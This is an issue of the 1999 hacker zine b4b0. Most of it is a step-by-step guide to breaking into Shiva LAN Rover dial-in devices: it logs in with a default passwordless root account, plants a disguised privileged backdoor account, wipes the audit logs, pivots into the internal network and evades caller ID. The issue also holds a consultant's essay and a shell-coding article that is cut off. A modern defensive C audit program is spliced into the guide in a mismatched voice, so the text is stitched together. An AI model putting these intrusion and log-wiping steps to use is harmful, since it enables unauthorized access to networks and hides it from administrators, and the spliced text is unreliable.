[ x - The Liberation of Vice - x ]

[ ASCII banner: b4b0 - s e v e n ]

the experience of new ideas and obtuse perspective

[ (c) 1999 The B4B0 Party Programme ]
[ Disrupting the classes of school   ]
[ teachers around the world.         ]

[TABLE OF CONTENTS]

(01). Introduction                            - [ph1x]
(02). Hacking the Shiva-Lan-Rover             - [Hybrid]
(03). Womper Language Interpreter             - [chrak]
(04). My Day in Age                           - [Rhinestone Cowboy]
(05). Coding a Shell From the Ground Up       - [ph1x]
(06). The Art of Writing Shell Code           - [smiler]
(07). The Telephone System/Network Part 1     - [pabell]
(08). Revolution Against the Catholic Church  - [schemerz]
(09). bsaver.c Overview                       - [cp4kt]
(10). Conclusion                              - [ph1x]

Additional pieces included in this issue of b4b0 are...

[ bouncer.c ]  ----------> intruderx
[ bsaver.c ]   ----------> comp4ct and qytpo
[ carp.c ]     ----------> comp4ct
[ carriers.txt ] --------> comp4ct
[ encrypt.c ]  ----------> tragen
[ fbsd.tgz ]   ----------> icesk
[ gh-cgi.c ]   ----------> fred
[ misc.zip ]   ----------> milcrat
[ w00f.c ]     ----------> cossack and smiler

. -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- - |

ph1x     ----------------> the chosen one
jsb4ch   ----------------> the undecided one
t1p      ----------------> acclaimed b4b0 admin
gr1p     ----------------> he whose accent slays
j\       ----------------> the freezing wonder
chr4k    ----------------> the one who operates with a blown mind
comp4ct  ----------------> he who claims to be a b4b0 saint
p4bell   ----------------> the one called the golden child
coss4ck  ----------------> the one of proclamation
sm1ler   ----------------> he who is emotionally content

. -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- - |

icesk   emf   zayten   pG   schemerz   jnz   Hybrid   assem   polder
Qytpo   e-    rhinestone cowboy   samj

--- Official IRC channel   -> Efnet / #!b4b0 (not #b4b0)
--- Most Idiotic Site Ever -> http://www.anticode.com
--- Irc Chick of the Month -> MostHated
--- Greets to              -> #!animalcrackers, rhino9, samj's mom, duke, horizon, LJ & Falon, HNN, those who have helped us and that we forgot about *sorry*, chixy and miah of the netcis crew (some of us started there!), and the NRA
--- Interesting Fact       -> The current IRC fad of saying "HEH" was invented in #b4b0. So we must require you to say the following when using HEH: HEH (c) b4b0 1999
--- P.S.                   -> We need more supporters who will write things for us other than inetd backdoors. Submit your article/code/remarks/ascii to submissions@b4b0.org

- -- ---> interesting <--- -- -

-- -- > http://www.babousa.org - baltimore academy for behavioral optometry
-- -- > http://www.babo.com - best gossip in korea!
-- -- > http://www.babo.com.au - babo morganti and partners
-- -- > http://www.babo.net - those wacky germans
-- -- > http://www.babo.org.uk - british association of balloon operators
-- -- > http://www.alvo.com/tvbabo - babo tv
-- -- > http://www.valhallabrewing.com/dboard/babo2000.htm - bay area brew-off

-------------------------------------------------------------------------------
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
-------------------------------------------------------------------------------

Greatest movie of all time, "Gummo":

I walked into the fruit market today; the clerk thought I was some out of town hick. "Those apples will be 2 dollars apiece," he tells me. This is where I outsmarted him.
I hand him a 5 dollar bill, and just as he's handing me a dollar change, I say... "keep it, we're even." On the way out, I stepped on a grape.

******************************************************************************
[INTRODUCTION]
******************************************************************************

We have had several people who have taken charge as editor for this issue, but have not followed through with their responsibilities. Therefore, I (ph1x), the unreliable drug addict, have been chosen to get all of the submissions together and put together a nice issue with good quality reading material. I have miraculously managed to do so, so read to your heart's desire, and enjoy this issue. HEH!

PS. I apologize for the extreme lateness of this issue, it's just that jsbach *cough* I mean... various people said they were going to write articles, and never did. =)

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hacking the Shiva-LAN-Rover System
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

By Hybrid (th0rn@coldmail.com)
April 1999

Contents:
1. Introduction
2. What can Shiva LAN Rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world. If, like me, you have done quite a lot of scanning, you would have come across a login prompt similar to this:

[@ Userid:]

If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to focus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems. The Shiva system is a network security problem in its own right, in the sense that once you have gained access to one of these platforms, you have the opportunity to explore the entire network on which the system is based; in essence, you are on the trusted side of the firewall.
If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer program, and start scanning local or toll-free prefix assignments; if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt:

@ Userid:

or, if Radius authentication is enabled:

Starting Radius Authentication....
@ Userid:

Blah, ignore the Radius authentication thing for now, it's just a lame attempt to make the system look as if it has been secured; in most cases the sysadmin would have misconfigured the authentication and you will be surprised as to how easy it is to get in.

So you are at the login prompt, what next? - As in most OSs, Shivas have a nice set of default logins, so the sysadmin's poor setup is your gain. Try this: login: pass: . The root login will work 9 times out of 10. The reason that the root account works a lot is because in some cases the admin is not even aware the account exists! Most of the system setup is done via the main terminal, so the admin doesn't have to log in. The root account is not listed in the userfile database, so most admins overlook it. In some cases the admin would have set up their own account with something like but if the admin has any common sense you will not get in with that. Like most OSs, Shiva systems have an audit log, so don't sit there trying to brute force anything; once you are in, you can clear the system log, but more on that later.

OK, you've found a Shiva, you've logged on as , now what? - read on. Once logged in, you will be dropped into the Shiva command line prompt, which should look something like this:

Shiva LanRover/8E, Patch 4.5.4p6 98/06/09   (Version and type of Shiva)
ShivaLanRover/8E#                           (The command prompt. Can be configured to say anything)

To get a list of the available commands type or this will reveal a menu similar to this:

ShivaLanRover/8E# ?
alert          Send text alert to all dial-in users
busy-out line  Busy-out serial line modem
clear          Reset part of the system
comment        Enter a comment into the log
configure      Enter a configuration session
connect        Connect to a shared serial port
crashdump      Write crashblock to log
disable        Disable privileges
help           List of available commands
initialize     Reinitialize part of the system
lan-to-lan     Manage LAN-to-LAN connections
passwd         Change password
ping           Send ICMP echo to IP host
ppp            Start a PPP session
quit           Quit from shell
reboot         Schedule reboot
show           Information commands, type "show ?" for list
slip           Start a SLIP session
telnet         Start a Telnet session
testline       Test a line

The first thing you should do is check to see who is online; at the # prompt use the show command to reveal the list of current online users:

ShivaLanRover/8E# show users
Line  User      Activity   Idle/Limit   Up/Limit
   1  jsmith    PPP          0/ 10       0/ None
   2  root      shell        0/ 10       0/ None
Total users: 2

So here we see ourselves logged in on line 2, and a PPP user on line 1. Note that most of the time users are not configured to be allowed remote dial-in PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, i.e. check that the admin is not logged in. Next you need to get a rough idea of the size of the system and its network.
At the # prompt type:

ShivaLanRover/8E# show lines
Async Lines:
Line State    Rate/P/Stop/  RA|DCD|DSR|DTR|RTS|CTS|Fr errs|Overruns|PErrs
  1  IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
  2  CHAR    57600/N/ 1/    |ON |ON |on |on |ON |      2|       0|    0
  3  IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
  4  IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
  5  IDLE    57600/N/ 1/    |OFF|OFF|on |on |OFF|      0|       0|    0
  6  IDLE   115200/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
  7  IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
  8  IDLE   115200/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0

Here we see a list of the modem ports; as you can see it has 8, which is about average for most Shiva systems. So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is. To do this type:

ShivaLanRover/8E# show arp
Protocol  Address          Age  Hardware Addr      Type  Interface
Internet  208.122.87.6     4m   x0-x0-B0-2x-Dx-78  ARPA  Ethernet:IP
Internet  208.122.87.4     4m   AA-0x-x4-00-0C-04  ARPA  Ethernet:IP
Internet  208.122.87.5     4m   Ax-00-04-0x-xD-x4  ARPA  Ethernet:IP
Internet  208.122.86.4     10m  AA-x0-04-00-0C-04  ARPA  Ethernet:IP
Internet  208.122.86.40    0m   AA-00-04-00-x1-04  ARPA  Ethernet:IP
Internet  208.122.86.147   4m   00-80-5x-31-F8-Ax  ARPA  Ethernet:IP
Internet  208.122.86.145   4m   00-80-5x-FE-C9-x8  ARPA  Ethernet:IP
Internet  208.122.86.200   0m   00-x0-A3-xF-21-C8  ARPA  Ethernet:IP
Internet  208.122.86.51    4m   00-x0-B0-01-36-3x  ARPA  Ethernet:IP

Showing the ARP cache reveals some of the boxes connected to the LAN, as well as their ethernet addresses and protocol type. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file.

2. What can Shiva LAN Rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin.
A Shiva system can be configured to provide a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol)
This is the key to gaining access to the network on which the Shiva is based. In most cases the network will have an internal DNS server, and if you are lucky, the network the system is based on will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas.

Modem Outdial
In a lot of cases the system would have been configured to allow modem outdialing, which can be good for calling BBSs, diverting to other dialups, scanning, but again, this is lame; just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online and at the same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc.
These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later.

It's time to go into detail about all of the Shiva's functions and commands. I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to.

3. The command line

When logged into the Shiva shell, you have the following commands at your disposal:

alert (Send text alert to all dial-in users) - Self explanatory.

busy-out uart (Busy-out UART port)

clear (Reset part of the system)
The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc. To do this all you need to do is type This will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as etc., but these will all cause system problems and get you noticed; best leave these alone for the time being.

comment (Enter a comment into the log)

configure (Enter a configuration session)
Here's the part where you can get the system to do what you want it to do, i.e. to get a PPP connection you will need to set up another account with shell and PPP privileges. The root account does not allow PPP connections, so here is where you will need to do your stuff. To get anywhere with a Shiva you need to create a new account; using the config command you can create a new user account with greater privileges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system. You don't want to make an account that will stick out from the other accounts, so type:

show security (this gives a list of the security configuration and the user list.)

You should see something like this:

[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6
[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052

Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely.
In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one as well. The idea is to make an account that will blend in with the others and not look too obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc.; more on these functions in a bit.

OK, now we need to set up our own account. To do this we need to enter a configuration session; at the command line prompt type:

ShivaLanRover/8E# config

You will then drop into the configuration session.

Enter configuration file lines.  Edit using:
  ^X, ^U    clear line
  ^H, DEL   delete one character
  ^W        delete one word
  ^R        retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.
config>                  (here is where you enter the config commands; to make your own account do the following)
config> [users]
config> username=/di/do/sh/tp/pw
config> ^D               <------ (type control D to finish)
Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.

You've just created your own user account which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password; you can later change this. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password, and if you wanted to give yourself another root account, you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and log in as your username; more on this later.
connect (Connect to a serial port or modem)
This is another one of the good features of Shivas: you can remotely control a series of modems on the system, and in a lot of cases dial out. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors. To connect to a modem type:

connect all_ports

You will then drop into one of the modem pools, as follows:

Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.

(here basic modem commands are necessary; use the following to dial out)

ATZ              (initialise modem)
ATDTxxxxxxxxx    (atdt then phone number)

Note that in some cases the modem outdial will be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be something simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is logged into the audit file, along with the number you called. It is generally a good idea to clear the audit log after things like PPP or dialout; again just type clear log.

cping (Send continuous ICMP echoes to IP host)

crashdump (Write crashblock to log)

detect (Detect the configuration of an interface)

disable (Disable your root privileges)

dmc (Information commands, type "dmc ?" for list)
    down           (last Remove modems from CCB pool)
    info           (Print info for specified modem)
    mupdate        (l Update Rockwell modem FW)
    state          (Print state of a modem)
    status         (Print status of all modems)
    trace          (Trace message passing)
    up             (lastmo Add modems to CCB pool)
    test_1slot     (Tests DMC card in slot specified)
    test_allcards  (Tests all DMC cards found in system)
    test_golden    (Tests all DMC cards against a Golden DMC)
    test_loopall   (Tests All DMC's for count)
    test_modempair (modem1 Tests modems against each other)
    test_slotpair  (Tests a DMC card against another)
    test_xmitloop  (Tests modem pair for count)

help (List of available commands)

history (List of previous commands)

initialize (Reinitialize part of the system)

l2f (L2F commands)
    close    (Close tunnel to L2F HG)
    login    (Start L2F session)
    tunnels  (Show open tunnels)

lan-to-lan (Manage LAN-to-LAN connections)

passwd (Change password)

ping (Send ICMP echo to IP host)

ppp (Start a PPP session)

quit (Quit from shell)

reboot (Schedule reboot)

route (Modify a protocol routing table)

rlogin (Start an rlogin session)

show (Information commands, type "show ?" for list)

show+
    account        (Accounting information)
    arp            (ARP cache)
    bridge         (Bridging information)
    buffers        (Buffer usage)
    configuration  (Stored configuration, may specify sections)

The show config command will reveal all the system configuration setups, including DNS server information, security configuration, IP routing etc. It will also show the internal IPs of RADIUS authentication and TACACS servers.

show+
    finger                        (Current user status)
    interfaces [name1 [name2 ...]] (Interface information)
    ip                            (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is, type show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are; it is a good idea to note the IP prefixes.
show+
    lan-to-lan  (LAN-to-LAN connections)
    license     (Licensing information)
    lines       (Serial line information)
    log         (Log buffer)

The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, i.e. is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut down example as to what you would see in a system log file:

Mon 15 16:24:29 GMT 1998
4530 Serial4: "krad" logged in                                               00:01
4531 Serial4:PPP: Received LCP Code Reject for code 0D                       00:01
4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)              00:00
4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast               00:00
4534 Serial4:PPP: IPCP layer up                                              00:04
4535 Serial4:PPP: CCP layer up                                               14:09
4536 Serial4:PPP: IPCP layer down                                            00:00
4537 Serial4:PPP: CCP layer down                                             00:00
4538 Serial4:PPP: LCP layer down                                             00:01
4539 Serial4:PPP: CD dropped on connection                                   00:00
4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)        00:06
4541 Serial4: Rate 115200bps                                                 00:00
4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'          00:01
4543 Serial4: Initialized modem                                              04:56
4544 setting time of day from real-time clock to Wed Nov 25 16:43:44         18:27
4545 Serial4: New Dial-In session                                            00:00
4546 Serial4:PPP: LCP layer up                                               00:00
4547 Serial4: "krad" logged in                                               00:01
4548 Serial4:PPP: Received LCP Code Reject for code 0C                       00:00
4549 Dialin:IPX configured net 9823O049                                      00:00
4550 Serial4:PPP: IPXCP layer up                                             00:00
4670 Serial4: New Command Shell session                                      00:03
4671 Serial4: "root" logged in                                               01:38
4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)       00:06
4673 Serial4: Rate 115200bps                                                 00:01
4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'          00:00
4675 Serial4: Initialized modem                                              55:11
4676 Could not parse IP SNMP request.

In the system log, you will also see invalid login attempts, error messages, and general system events.
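For the admin side of the same two outputs, here is an added example (my code, not Shiva's or the article's) that flags what the user list and the audit log above reveal: accounts with shell or root privileges or no password set, and "root" logins or new command-shell sessions arriving over a dial-in Serial line. Sample entries are taken from the article; the "newacct" entry is constructed.

```c
/* Audit "show security" user entries and "show log" lines in the formats
 * the article prints. Added example; the Shiva option meanings (/sh, /rt,
 * /pwd=) are the ones the article gives. */
#include <stdio.h>
#include <string.h>

#define RISK_NO_PASSWORD 1   /* no /pwd= hash: logs in with an empty password */
#define RISK_SHELL       2   /* /sh: may log into the command shell remotely */
#define RISK_ROOT        4   /* /rt: root privileges */

/* True if flag (e.g. "/sh") appears as a whole option in opts, so that
 * "/pw" would not match inside the "/pwd=" hash field. */
static int has_flag(const char *opts, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = opts;

    while ((p = strstr(p, flag)) != NULL) {
        if (p[n] == '\0' || p[n] == '/')
            return 1;
        p += n;
    }
    return 0;
}

/* Audit one "[Users]" entry such as
 *   admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
 * Returns a bitmask of RISK_* values, or -1 if the line is not a user
 * entry (e.g. "PWAttempts=0" from [UserOptions]). */
int audit_user_entry(const char *line)
{
    const char *opts = strchr(line, '=');
    int risk = 0;

    if (opts == NULL || opts[1] != '/')       /* user options always start with '/' */
        return -1;
    opts++;
    if (strstr(opts, "/pwd=") == NULL) risk |= RISK_NO_PASSWORD;
    if (has_flag(opts, "/sh"))         risk |= RISK_SHELL;
    if (has_flag(opts, "/rt"))         risk |= RISK_ROOT;
    return risk;
}

/* Audit one "show log" line. The article notes the admin normally works
 * from the console, so a "root" login or a new command-shell session on a
 * dial-in Serial line is worth reviewing. Returns 1 to flag, 0 otherwise. */
int audit_log_line(const char *line)
{
    if (strstr(line, "Serial") == NULL)
        return 0;
    return strstr(line, "\"root\" logged in") != NULL
        || strstr(line, "New Command Shell session") != NULL;
}

int main(void)
{
    /* Two entries quoted from the article, plus one constructed entry shaped
     * like the account the article creates (no password assigned yet). */
    static const char *users[] = {
        "admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425",
        "jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052",
        "newacct=/di/do/sh/tp/pw",
    };
    /* Log lines quoted from the article's "show log" excerpt. */
    static const char *log[] = {
        "4530 Serial4: \"krad\" logged in",
        "4670 Serial4: New Command Shell session",
        "4671 Serial4: \"root\" logged in",
        "4676 Could not parse IP SNMP request.",
    };
    size_t i;

    for (i = 0; i < sizeof users / sizeof users[0]; i++) {
        int r = audit_user_entry(users[i]);
        if (r < 0)
            continue;
        printf("%-75s ->%s%s%s\n", users[i],
               (r & RISK_NO_PASSWORD) ? " NO-PASSWORD" : "",
               (r & RISK_SHELL)       ? " SHELL"       : "",
               (r & RISK_ROOT)        ? " ROOT"        : "");
    }
    for (i = 0; i < sizeof log / sizeof log[0]; i++)
        printf("%s %s\n", audit_log_line(log[i]) ? "REVIEW" : "      ", log[i]);
    return 0;
}
```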
Because the log file logs everything, it is a good idea to erase your own presence in it.

show+
    modem                (Internal modem information, type "show modem ?" for list)
    netbeui              (NetBeui information, type "show netbeui ?" for list)
    novell               (NetWare information, type "show novell ?" for list)
    ppp                  (PPP multilink bundles and links)
    processes            (Active system processes)
    security             (Internal userlist)
    semaphores           (Active system semaphores)
    slot                 (Internal serial slot information, type "show slot ?" for list)
    upload               (Upload information)
    users                (Current users of system)
    version              (General system information, also shows DNS info)
    virtual-connections  (Virtual Connection information)

slip (Start a SLIP session)

telnet (Start a Telnet session)

tftp (Download new image, i.e. system config files)

tunnel (Start a Tunnel session)

wan [action] (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system including RADIUS Authentication, SecurID, TACACS, and just the standard secured login. In some cases an admin will use a secondary server to act as the RADIUS Authentication server. In this case, the setup would look something like this:

[RADIUS Authentication Server]   } The server contains a secured user
            |                      list, which will be used to verify
            |                      login requests. The login is
        [Router]                   determined if the user can be
            |                      verified by the server.
            |
            |                    } The Shiva sends the login request to RADIUS.
     [Shiva System]
            |                    } Starting Radius Authentication...
                                   @ Userid:

Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above, but without the RADIUS server, a secondary Shiva may be installed to act as the security server, and all other Shiva systems refer to it for user login verification.
This can be a real bitch if you have logged into a system, but the above setup has been implemented. For example, say you logged in as root, and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing If the verification server has been set up, there will be no users in the user list; instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification server, or primary Shiva, just use the show config command. You can then telnet from the Shiva you are on to the Shiva displayed in the config file; you should then get the @ Userid: login screen again. Try root with no password; if this does not work, it is possible to temporarily configure your own server on the network, but this would mean other users will not be able to log in, so leave this alone. If you do manage to log in to the server as root, you have to set up your user account there, because that is where all the Shivas on the network refer to in order to verify users; this way the admin only has to maintain one user configuration file.

5. PPP

Once you have set up a user account with shell and PPP privileges, you can begin exploring the network on which the Shiva is based. If the network is net connected you can get free net access as well, but this is quite risky, especially if the admin notices PPP sessions active at 4am, with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network or port scanner across the domain which the Shiva is on. As on most networks, you are likely to come across a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers; in one case someone I know found an Amiga box@$!.
If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to simultaneously dial out across the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. Using the command will give you control over the system modems; then you can dial out as if you were in terminal mode.

If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dial up to the system directly. The mistake people make when it comes to ANI, or CLID, is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong*: the ANI service can be set up by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationally, so your originating CLID gets stripped at intralata boundaries on the PSTN. A technique, which I don't wanna give out, involves trunk and carrier hopping.

Well, that's about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com; they will have technical guides in pdf format, and you can also download the Shiva software from their ftp site.

Shouts to the following:

[9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp.
[b4b0] gr1p t1p.
#9x #darkcyde Efnet.
backa xio.
[D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Womper Language Interpreter, by chrak
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

This is a neat language interpreter by chrak, that is still in development. Check out /w0mper, and make sure to read Example.sh to see a set of example code.

* NOTE * this isn't quite finished and hopefully chrak will come through with more releases. Thank you.

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
My Day in Age, by Rhinestone Cowboy
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

I had an epiphany the other day. It wasn't the kind of flash of insight that makes you shave your head, move to the desert, and change your name to something that sounds like an astronomical phenomenon, but I do think it's something that other people need to hear.

You see, I am a professional consultant, and with this project, I became a man.

I was tasked with building a firewall for a healthcare facility. This wasn't very difficult, and, apart from the planning phases and a lot of mostly useless meetings, it got built in a day or two. All the exceptions were put in place, and the LAN was protected to a degree to which it had never been protected before. All was right with the world...

... Until the client got involved.

It started with a simple request. "Could you please open up telnet services in the firewall to this one particular Solaris box? We have a few outside consultants who need to get into that box so they can work remotely. In particular, we have a user from an educational facility who needs remote root access."

I objected, of course, but I was then informed that it was the opinion of the IS staff that this was an "acceptable risk." This wasn't an opinion that could be justified by anyone, especially after they shelled out countless thousands of dollars on a "network security solution".
It got a little worse, of course. About a week later, I uncovered a bug in their web front end to their database. Instead of praise, I got what I should have expected, exchanges like the following:

"Only people who subscribe to this database should have access. Now you are telling me that ANYONE on the net can get this data for free? What the hell is that firewall doing?"

"The firewall is doing its job. The problem is that your web app never asked me for anything like a password. It just gave me access. It really wasn't complicated at all. A firewall simply cannot fix your buggy software."

"Firewalls make computers secure. This computer isn't secure. Obviously, the firewall you made doesn't work."

He just didn't get it. I would have been more than happy to spend the time to audit all the machines individually, apply the proper patches, and fix any configuration errors that may rear their ugly heads, if the client was willing to pay for my time. Hell, I'd even work hard! Unfortunately, the client didn't want to hear that. He wanted his "magic bullet," and if I wasn't willing to provide it, he'd hire another consulting company to do it.

It then occurred to me that this scenario is being played out all over the net, and it's a lot bigger than I had previously realized. I was playing a part, so was the IS director, so was my company, and so was the firewall.

Corporate America is all about "covering your ass." No one wants accountability for anything. If bullshit and 'passing the buck' were the keys to world domination, the USA would be the world's only superpower. Wait, never mind...

Anyway, this is what hit me. Firewalls do a lot more than filter packets and give IS gimps a warm fuzzy feeling when they go home at night. Firewalls manage to almost universally remove any traces of accountability in corporate security.
As in the above example, if, I mean when, someone sniffs the root password and uses it to compromise the LAN, the IS department can pretend that they weren't at fault. They can pass the buck to me or my company. Fortunately, there is a contract protecting us from lawsuits of that nature. If necessary, the buck can even be passed, either by my company or the client's, to the vendor. Even they can pass the buck, since any rational person would realize that they weren't involved in this morass. The myth of the "firewall as a magic bullet" is some of the most useful bullshit ever spun. It allows everyone to sleep easier at night and make a lot of money.

Of course, the buck ultimately stops getting passed by another piece of bullshit, the myth of "the genius hacker." I'm not saying that there aren't some genuinely brilliant people breaking into computers these days, but chances are they aren't relying on a 5 year old sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly enough to have a guessable NIS mapname.

The world is very broken. We have security products that either simply don't work, don't work up to the impossible expectations put on them, or even introduce further holes in hosts and networks they are supposed to be protecting. We also have a world of corporate IS managers, mostly incompetent "security consultants", and talentless bullshit artists who manage to social engineer their way into six figure incomes because they are "reformed hackers."

It would be nice if some kind of messiah of the computer age were to come along and make it all better. Unfortunately, that's not going to happen. If there was such a person, we'd either nail him to a cross or he would opt for the huge paycheck which comes with playing a part in the system.

I suspect I have finally entered into adult life, because I have little or no desire to change an awful system that I cannot fix. There are quite a few rewards for being as corrupt as everyone else.
So here is the choice facing us all: either sit down at the table of corruption and shared guilt and get paid a lot (basically sell out), or fight a hopeless battle against American corporate culture. I think adulthood is really choosing to play in the "bullshit playground" with the rest of the grownups. Today, I am a man.

Rhinestone Cowboy

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Coding a Shell from the Ground Up, by ph1x
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

In this article I am going to discuss what a shell is and how a shell works, and we're going to build a shell from the ground up. For all the source we're going to be writing today, we will need b4b0shell.h, included below. Let's get started.

A shell is a program that does command interpretation. A shell can also be referred to as a command processor, as most DOS users know. It reads input, then executes the command. Executing a command basically means creating a child process for the execution: the shell will fork() a child process to execute the command. The parent (the shell) will then wait for its child to finish before it reads another command.

Before we start coding, make sure you're using the following header file in all of your codez.

/**********************************/
/* Header file for the b4b0 shell */
/* Extrapolated from ush.h, and   */
/* added onto. ph1x@b4b0.org      */
/**********************************/
/* NOTE: We won't be making use of this whole header file today; our shell
